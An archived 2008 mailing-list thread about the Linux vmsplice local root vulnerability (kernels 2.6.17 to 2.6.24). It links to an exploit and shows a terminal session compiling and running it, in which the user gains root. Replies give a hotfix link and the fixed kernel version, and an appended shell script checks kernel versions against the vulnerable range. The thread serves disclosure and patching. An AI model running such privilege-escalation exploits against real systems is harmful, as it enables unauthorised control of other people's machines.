Well, there is a hotfix, but it's so buggy: http://www.ping.uio.no/~mortehu/disable-vmsplice-if-exploitable.c. Either recompile with vmsplice disabled, or grab yourself the brand new kernel 2.6.24.2; it's supposed to be fixed in it.

On Feb 12, 2008 5:49 AM, Ahmad Abu Gharbieh <[EMAIL PROTECTED]> wrote:
>
> sup guys,
> i thought i should share this
> 2 days ago a vulnerability was reported in kernel 2.6.17 - 2.6.24, a
> local root exploit can be found on
> https://bugs.gentoo.org/attachment.cgi?id=143059
> for more information on
> https://bugs.launchpad.net/ubuntu/+source/linux-source-2.6.22/+bug/190587
>
> to fix this u can recompile the kernel without vmsplice, other patches
> r available
>
> i tested it on gutsy x86_64 and it worked..
>
> [EMAIL PROTECTED]:/tmp$ gcc linux_vmsplice.c -o exploit
> [EMAIL PROTECTED]:/tmp$ whoami
> ag
> [EMAIL PROTECTED]:/tmp$ ./exploit
> -----------------------------------
> Linux vmsplice Local Root Exploit
> By qaaz
> -----------------------------------
> [+] mmap: 0x100000000000 .. 0x100000001000
> [+] page: 0x100000000000
> [+] page: 0x100000000038
> [+] mmap: 0x4000 .. 0x5000
> [+] page: 0x4000
> [+] page: 0x4038
> [+] mmap: 0x1000 .. 0x2000
> [+] page: 0x1000
> [+] mmap: 0x2b66fdb34000 .. 0x2b66fdb66000
> [+] root
> [EMAIL PROTECTED]:/tmp# whoami
> root
> [EMAIL PROTECTED]:/tmp#
>
>
> cheers..
>
> --
> \x41\x61\x67

--
Ala'a A. Ibrahim
http://guru.alaa-ibrahim.com/
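
A triage helper for the version range discussed in this thread, added here as an example and not part of either message: it classifies a kernel release string against the reported range (2.6.17 - 2.6.24) and the release the reply names as fixed (2.6.24.2). The function name `vmsplice_range_check` and the sample release strings are constructed for illustration; fixes backported by distributions or stable branches are not reflected, so an "in-range" result means the vendor advisory still has to be checked.

```shell
#!/bin/sh
# Added example (not from the thread). Encodes only what the posts state:
# 2.6.17 - 2.6.24 reported vulnerable, 2.6.24.2 reported fixed.
# Hypothetical helper name; prints one of:
#   in-range | reported-fixed | outside-range | unparseable

vmsplice_range_check() {
    # Keep the leading numeric part: "2.6.22-14-generic" -> "2.6.22"
    base=${1%%[!0-9.]*}
    old_ifs=$IFS; IFS=.
    set -- $base            # split on dots into $1..$4
    IFS=$old_ifs
    major=$1 minor=$2 patch=$3 stable=${4:-0}

    # Every component must be a non-empty run of digits.
    for n in "$major" "$minor" "$patch" "$stable"; do
        case $n in
            ''|*[!0-9]*) echo unparseable; return 0 ;;
        esac
    done

    if [ "$major" -ne 2 ] || [ "$minor" -ne 6 ] ||
       [ "$patch" -lt 17 ] || [ "$patch" -gt 24 ]; then
        echo outside-range
    elif [ "$patch" -eq 24 ] && [ "$stable" -ge 2 ]; then
        echo reported-fixed
    else
        echo in-range
    fi
}

# Constructed sample releases, followed by the running kernel.
for rel in 2.6.22-14-generic 2.6.24 2.6.24.2 2.6.16.60 "$(uname -r)"; do
    printf '%-22s %s\n' "$rel" "$(vmsplice_range_check "$rel")"
done
```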

